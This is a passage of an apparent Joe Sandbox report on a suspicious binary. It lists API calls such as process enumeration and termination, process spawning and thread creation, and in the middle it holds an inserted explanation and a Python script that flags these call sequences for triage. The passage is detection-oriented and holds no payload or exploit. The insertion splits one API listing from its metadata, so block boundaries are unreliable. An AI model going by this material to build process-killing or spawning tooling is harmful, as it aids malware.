                                                      • SelectObject.GDI32(00000000,00000000), ref: 00A9CFB8
                                                      • ReleaseDC.USER32(?,00000000), ref: 00A9CFC0
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A9D04B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: b69c0a65d690e7662b56a3c8783f172d45852ed3a1bf52972ea849e01a6ecafc
                                                      • Instruction ID: 679e9320b13b90130e3add784108ea9461f9724fe09d72774880a4b94a8d549a
                                                      • Opcode Fuzzy Hash: b69c0a65d690e7662b56a3c8783f172d45852ed3a1bf52972ea849e01a6ecafc
                                                      • Instruction Fuzzy Hash: 0671B331600645DFCF21CF64C994AAA7BF6FF49360F14427AED565B1A6C7328C82DB60
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                        • Part of subcall function 00A62344: GetCursorPos.USER32(?), ref: 00A62357
                                                        • Part of subcall function 00A62344: ScreenToClient.USER32(00B267B0,?), ref: 00A62374
                                                        • Part of subcall function 00A62344: GetAsyncKeyState.USER32(00000001), ref: 00A62399
                                                        • Part of subcall function 00A62344: GetAsyncKeyState.USER32(00000002), ref: 00A623A7
                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00AEC2E4
                                                      • ImageList_EndDrag.COMCTL32 ref: 00AEC2EA
                                                      • ReleaseCapture.USER32 ref: 00AEC2F0
                                                      • SetWindowTextW.USER32(?,00000000), ref: 00AEC39A
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AEC3AD
                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00AEC48F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                      • API String ID: 1924731296-2107944366
                                                      • Opcode ID: 23d397e175fc0b98e839732ea2b01429a4f9a7e16c6eb5b261851ab263105128
                                                      • Instruction ID: 4470143ac0f4fe1c0cbc94014927ae71251b56414d0abe2c08a68f494e88ce9a
                                                      • Opcode Fuzzy Hash: 23d397e175fc0b98e839732ea2b01429a4f9a7e16c6eb5b261851ab263105128
                                                      • Instruction Fuzzy Hash: 31518B71204384AFD710EF24CD95FAA7BF5EB98310F00892DF5958B2E1DB70A946CB52
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00AEF910), ref: 00AD903D
                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00AEF910), ref: 00AD9071
                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AD91EB
                                                      • SysFreeString.OLEAUT32(?), ref: 00AD9215
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                      • String ID:
                                                      • API String ID: 560350794-0
                                                      • Opcode ID: 3d90000ef8f095dfbcf95428089517bb79518c79f3f406c976cfe8b61703e2c8
                                                      • Instruction ID: 8c61dc6219ce4f509996dab508ea4d41fff0674b9a176439ae30b2de62fb507c
                                                      • Opcode Fuzzy Hash: 3d90000ef8f095dfbcf95428089517bb79518c79f3f406c976cfe8b61703e2c8
                                                      • Instruction Fuzzy Hash: 6DF1F775A00209EFDB04DF94C888EAEB7B9FF49314F10855AF516AB291DB31EE46CB50
                                                      APIs
                                                      • _memset.LIBCMT ref: 00ADF9C9
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ADFB5C
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ADFB80
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ADFBC0
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ADFBE2
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ADFD5E
                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00ADFD90
                                                      • CloseHandle.KERNEL32(?), ref: 00ADFDBF
                                                      • CloseHandle.KERNEL32(?), ref: 00ADFE36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                      • String ID:
                                                      • API String ID: 4090791747-0
                                                      • Opcode ID: 471fe7ffcf5b4a52482a29617bc9ce38b0c3f326945042a38bb196fab3131037
                                                      • Instruction ID: 5f6d2d8dcdf1ad962bdd958bc923351e08b715121722ab787d956217a964ae6f
                                                      • Opcode Fuzzy Hash: 471fe7ffcf5b4a52482a29617bc9ce38b0c3f326945042a38bb196fab3131037
                                                      • Instruction Fuzzy Hash: 3AE180312043419FCB14EF24C991A6BBBE5AF84354F18856EF89A8B3A2DB31DC45CB52
                                                      APIs
                                                        • Part of subcall function 00AC48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AC38D3,?), ref: 00AC48C7
                                                        • Part of subcall function 00AC48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AC38D3,?), ref: 00AC48E0
                                                        • Part of subcall function 00AC4CD3: GetFileAttributesW.KERNEL32(?,00AC3947), ref: 00AC4CD4
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00AC4FE2
                                                      • _wcscmp.LIBCMT ref: 00AC4FFC
                                                      • MoveFileW.KERNEL32(?,?), ref: 00AC5017
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                      • String ID:
                                                      • API String ID: 793581249-0
                                                      • Opcode ID: 32c70b357c19ba450e39cf2450f6daf2939c0a65a42b65fde9d6713cee9c8178
                                                      • Instruction ID: 23fbe8ae2e5d9fa896dc6ef0bc50d22933f2fe85362bf6449a6001f852a447ab
                                                      • Opcode Fuzzy Hash: 32c70b357c19ba450e39cf2450f6daf2939c0a65a42b65fde9d6713cee9c8178
                                                      • Instruction Fuzzy Hash: F65174B24087859BC720EBA0C995EDFB3ECAF85340F00492EB589D7151EF74B688C766
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AE896E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: ca45332fccd45cc8905a04be97a1a4aa3362230ee7ee30ae6b9aebfd28da678b
                                                      • Instruction ID: 9db7bb2f106bf7d8f70dae599a6ab5587af18dadfc76b033507e341c8f6827fe
                                                      • Opcode Fuzzy Hash: ca45332fccd45cc8905a04be97a1a4aa3362230ee7ee30ae6b9aebfd28da678b
                                                      • Instruction Fuzzy Hash: A151B2306002C8BFDF20DF2ACC85BA93BA5FB04390F604566F919E71E1DF79A9808B51
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00A9C547
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A9C569
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A9C581
                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00A9C59F
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A9C5C0
                                                      • DestroyIcon.USER32(00000000), ref: 00A9C5CF
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A9C5EC
                                                      • DestroyIcon.USER32(?), ref: 00A9C5FB
                                                        • Part of subcall function 00AEA71E: DeleteObject.GDI32(00000000), ref: 00AEA757
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                      • String ID:
                                                      • API String ID: 2819616528-0
                                                      • Opcode ID: d10ac6be0db610fca95a805d5e09224bc200ffc94649ff39f146efdfba76c693
                                                      • Instruction ID: a843a271fe35563d7e47044b8f54b0de32599abeeb693ef4e46408ee190701f1
                                                      • Opcode Fuzzy Hash: d10ac6be0db610fca95a805d5e09224bc200ffc94649ff39f146efdfba76c693
                                                      • Instruction Fuzzy Hash: 1B515870640A49AFDB20DF24CC85FAA3BF5EB58760F104529F902AB2A0DB70ED91DB50
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E0C
                                                      • HeapAlloc.KERNEL32(00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E13
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AB8A84,00000B00,?,?), ref: 00AB8E28
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E30
                                                      • DuplicateHandle.KERNEL32(00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E33
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00AB8A84,00000B00,?,?), ref: 00AB8E43
                                                      • GetCurrentProcess.KERNEL32(00AB8A84,00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E4B
                                                      • DuplicateHandle.KERNEL32(00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E4E
                                                      • CreateThread.KERNEL32(00000000,00000000,00AB8E74,00000000,00000000,00000000), ref: 00AB8E68
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: ca4f2f7421b4198138cc045ac68b472aa705bb913cb73bf30a85469c85b9d4f7
                                                      • Instruction ID: 50f196ab1dbc9ea959166555b537ec45a9e882fa869a6ad320d4150c705fd476
                                                      • Opcode Fuzzy Hash: ca4f2f7421b4198138cc045ac68b472aa705bb913cb73bf30a85469c85b9d4f7
                                                      • Instruction Fuzzy Hash: 980154B5640348FFE610EBA5DC89F6B7BACEB89711F418521FB05DF2A1CA759801CB60
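The "APIs" listings in this section are the raw material an analyst turns into triage rules: each line gives the imported function, its module, the argument constants the disassembler could resolve, and the call-site address. The Python below is an added example, not code from Joe Sandbox or from the sample; it parses lines in exactly the `• Name.MODULE(args), ref: ADDR` shape this report prints (including the "Part of subcall function" prefix), decodes the constants, and flags three sequences that occur in this section: process enumeration followed by OpenProcess with desired access 0x1 (PROCESS_TERMINATE) and TerminateProcess, a CreateProcessW spawn, and DuplicateHandle followed by CreateThread. The sample listings are copied from this report; reading them as the script runtime's built-in process helpers (the detection summary classes the sample as a compiled AutoIt script) is an inference of this example, not something the report states.

```python
"""Parse Joe Sandbox execution-graph "APIs" listings and flag process-control call sequences."""
import re
from dataclasses import dataclass
from typing import Optional

# One entry of an "APIs" block, exactly as the report prints it, e.g.
#   • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ADECB8
#   • GetLastError.KERNEL32 ref: 00ADECCB
#   • Part of subcall function 00AC3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00AC3EC4
API_LINE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-F]{8}):\s*)?
        (?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9_]+)
        (?:\((?P<args>[^)]*)\))?
        ,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$""",
    re.VERBOSE,
)

PROCESS_TERMINATE = 0x0001  # winnt.h access right, checked against OpenProcess's first argument


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple             # int for a resolved constant, None where the report prints '?'
    ref: int                # call-site address
    subcall: Optional[int]  # callee address for "Part of subcall function" lines, else None


def _arg(token: str):
    token = token.strip()
    if token in ("", "?"):
        return None
    return int(token, 16)   # accepts '00000001' and signed forms such as '-C0000018'


def parse_listing(text: str) -> list:
    """Return the API calls of one function listing in report order; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(_arg(t) for t in raw.split(",")) if raw is not None else ()
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def open_process_rights(calls) -> list:
    """Desired-access masks of every OpenProcess call whose first argument was resolved."""
    return [c.args[0] for c in calls
            if c.api == "OpenProcess" and c.args and c.args[0] is not None]


def triage(calls) -> list:
    """Flag call sequences worth a closer look, using only order and constants from the listing."""
    names = [c.api for c in calls]
    findings = []
    if ("CreateToolhelp32Snapshot" in names and "TerminateProcess" in names
            and any(mask & PROCESS_TERMINATE for mask in open_process_rights(calls))):
        findings.append("kill-by-name: enumerates processes, opens one with PROCESS_TERMINATE, terminates it")
    if "CreateProcessW" in names:
        findings.append("spawns a child process with CreateProcessW")
    if "DuplicateHandle" in names and "CreateThread" in names:
        findings.append("duplicates handles into a new worker thread")
    return findings


# Sample input: lines copied from this report's listings, used here as constructed fixtures.
KILL_LISTING = """\
  • Part of subcall function 00AC3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00AC3EB6
  • Part of subcall function 00AC3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00AC3EC4
  • Part of subcall function 00AC3E91: CloseHandle.KERNEL32(00000000), ref: 00AC3F8E
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ADECB8
• GetLastError.KERNEL32 ref: 00ADECCB
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ADECFA
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00ADED77
• GetLastError.KERNEL32(00000000), ref: 00ADED82
• CloseHandle.KERNEL32(00000000), ref: 00ADEDB7
"""
SPAWN_LISTING = """\
• _memset.LIBCMT ref: 00ADF9C9
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ADFB5C
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ADFD5E
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00ADFD90
• CloseHandle.KERNEL32(?), ref: 00ADFDBF
"""
THREAD_LISTING = """\
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E0C
• HeapAlloc.KERNEL32(00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E13
• DuplicateHandle.KERNEL32(00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E33
• CreateThread.KERNEL32(00000000,00000000,00AB8E74,00000000,00000000,00000000), ref: 00AB8E68
"""

if __name__ == "__main__":
    for name, listing in (("kill", KILL_LISTING), ("spawn", SPAWN_LISTING), ("thread", THREAD_LISTING)):
        print(name, triage(parse_listing(listing)))
```

The parser deliberately keeps unresolved arguments as None rather than guessing, so a rule such as the PROCESS_TERMINATE check only fires when the disassembler actually recovered the constant; the OpenProcess lines in this report do resolve the access mask, the CreateProcessW line does not resolve bInheritHandles, and the code reflects that difference instead of papering over it.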
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$_memset
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2862541840-625585964
                                                      • Opcode ID: 7de114e858cc7f191d4446433c1c41fe43777b6e4427949ddb1afbc931259c63
                                                      • Instruction ID: 34c47398f0be943ab9ff646c4edca4a66168e4ad1f1a1a7031565f448b45c50f
                                                      • Opcode Fuzzy Hash: 7de114e858cc7f191d4446433c1c41fe43777b6e4427949ddb1afbc931259c63
                                                      • Instruction Fuzzy Hash: AA919F71A00215ABDF24DFA5D848FAFBBB8EF45714F10815AF516AB280D770E945CFA0
                                                      APIs
                                                        • Part of subcall function 00AB7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?,?,00AB799D), ref: 00AB766F
                                                        • Part of subcall function 00AB7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?), ref: 00AB768A
                                                        • Part of subcall function 00AB7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?), ref: 00AB7698
                                                        • Part of subcall function 00AB7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?), ref: 00AB76A8
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00AD9B1B
                                                      • _memset.LIBCMT ref: 00AD9B28
                                                      • _memset.LIBCMT ref: 00AD9C6B
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00AD9C97
                                                      • CoTaskMemFree.OLE32(?), ref: 00AD9CA2
                                                      Strings
                                                      • NULL Pointer assignment, xrefs: 00AD9CF0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 1300414916-2785691316
                                                      • Opcode ID: c84785a8540af42dc0da00b89ce138ca70d69a57b47ecdd74da221060ab7db05
                                                      • Instruction ID: e0a530f86d2687381d1a69324e665b19f304cbd20fba7c2059e6b35f4a75a04c
                                                      • Opcode Fuzzy Hash: c84785a8540af42dc0da00b89ce138ca70d69a57b47ecdd74da221060ab7db05
                                                      • Instruction Fuzzy Hash: 56913871D00219AFDB10DFA4DD84ADEBBB9FF08710F20415AF51AA7281DB719A45CFA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AE7093
                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00AE70A7
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AE70C1
                                                      • _wcscat.LIBCMT ref: 00AE711C
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AE7133
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AE7161
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat
                                                      • String ID: SysListView32
                                                      • API String ID: 307300125-78025650
                                                      • Opcode ID: 8f3b02cf6a8aa8c07e190171dcf1c0ba79bf368814708740afcafacab13be317
                                                      • Instruction ID: 69b57babad79796e58d2c073f431a279900e0c7dd2382be89598035cfbb642e8
                                                      • Opcode Fuzzy Hash: 8f3b02cf6a8aa8c07e190171dcf1c0ba79bf368814708740afcafacab13be317
                                                      • Instruction Fuzzy Hash: 4041A271A04388AFEB21DFA5CC85BEE77F8EF08350F10056AF944A71A2D7719D858B60
                                                      APIs
                                                        • Part of subcall function 00AC3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00AC3EB6
                                                        • Part of subcall function 00AC3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00AC3EC4
                                                        • Part of subcall function 00AC3E91: CloseHandle.KERNEL32(00000000), ref: 00AC3F8E
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ADECB8
                                                      • GetLastError.KERNEL32 ref: 00ADECCB
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ADECFA
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00ADED77
                                                      • GetLastError.KERNEL32(00000000), ref: 00ADED82
                                                      • CloseHandle.KERNEL32(00000000), ref: 00ADEDB7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: f2c8690a5a07424cd9e56b5aecc66c88dc8be2a6d82c300685d79fb4d9f49116
                                                      • Instruction ID: 9bcd6dae1e50535a10b336c019c6306788013646c9c929a0e76311b20f39b67a
                                                      • Opcode Fuzzy Hash: f2c8690a5a07424cd9e56b5aecc66c88dc8be2a6d82c300685d79fb4d9f49116
                                                      • Instruction Fuzzy Hash: 8241AC712002019FDB14EF24CD95F6EB7A9AF80714F08805DF9829F3D2DB74A905CB91
                                                      APIs
